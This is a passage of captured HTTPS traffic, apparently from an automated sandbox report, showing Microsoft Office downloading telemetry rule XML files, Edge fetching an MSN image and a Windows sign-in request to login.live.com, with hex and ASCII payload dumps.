                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        127192.168.2.54991613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                        x-ms-request-id: 32ea5c27-601e-003d-489b-3b6f25000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234957Z-r1d97b99577tssmjhC1TEB8kan00000009k0000000001srt
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        128192.168.2.54991713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                        x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234957Z-178bfbc474bp8mkvhC1NYCzqnn00000000g0000000003yk6
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        129192.168.2.54991813.107.246.454437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                        x-ms-request-id: 02a30eba-b01e-0001-5b7b-3b46e2000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234957Z-r1d97b99577xdmfxhC1TEBqbhg0000000190000000004krz
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        130192.168.2.54992223.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:58 UTC505OUTGET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:58 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 05:16:37 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 62552
                                                                                                                                                                                                                                                        X-Datacenter: eastus
                                                                                                                                                                                                                                                        X-ActivityId: b6de683a-38cf-4a4e-bd01-aa1a6ca52471
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 8192
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=322044
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 17:17:22 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:58 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:58 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                        Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        131192.168.2.54992113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:58 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                        x-ms-request-id: d5b120ed-d01e-0017-3f65-3bb035000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234958Z-178bfbc474b7cbwqhC1NYC8z4n00000000gg00000000gp6e
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        132192.168.2.54992613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                        x-ms-request-id: c9b33041-e01e-0033-176b-3b4695000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234959Z-178bfbc474bpnd5vhC1NYC4vr400000000mg00000000x1e9
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        133192.168.2.54992513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                        x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234959Z-178bfbc474bq2pr7hC1NYCkfgg00000000wg000000007zpr
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        134192.168.2.54992740.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:59 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: fa4b8c9b-581a-4292-82c4-b1279403ac28
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D782 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 1918
